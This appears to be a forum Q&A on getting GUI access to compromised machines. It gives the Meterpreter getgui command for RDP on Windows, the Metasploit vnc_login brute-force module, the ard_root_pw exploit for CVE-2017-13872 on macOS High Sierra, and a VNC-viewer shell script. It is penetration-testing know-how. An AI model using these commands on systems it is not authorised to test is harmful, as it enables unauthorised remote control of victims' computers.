If the exploited victim OS is Windows, metasploit has the getgui command to run RDP. Then he can manipulate the victim OS through the GUI desktop interface.
meterpreter > run getgui -u loneferret -p password
Q1: Is there a similar one-command to setup tool for MacOS victims? .. or maybe some metasploit / evilosx modules to set up a VNC connection?
You can try to use vnc_login auxiliary scanner to identify if there's available VNC in target and attempt to login with a password or a wordlist:
msf > use auxiliary/scanner/vnc/vnc_login
And/or ard_root_pw to remotely exploit CVE-2017-13872 over 5900 port - if requirements are met:
msf > use auxiliary/scanner/vnc/ard_root_pw
Some notes by
ard_root_pw's author (jgor):This extends Rex::Proto::RFB to support usernames, implements authentication security type 30 ("Apple Remote Desktop" / ARD used by macOS), and uses that to add a module to remotely exploit CVE-2017-13872 over 5900/tcp on vulnerable macOS High Sierra hosts that have either Screen Sharing or Remote Management enabled.
(source)
Q2: Or I must do it manually without easy to use scripts?
If you already have access (w/ shell or meterpreter) in target, you should consider that Apple includes a VNC Client by default, you can use it with a simple bash script:
echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
echo open vnc://\$1 >> /usr/local/bin/vncviewer
chmod +x /usr/local/bin/vncviewer
After that, simply use: vncviewer [IP]:5901
(source)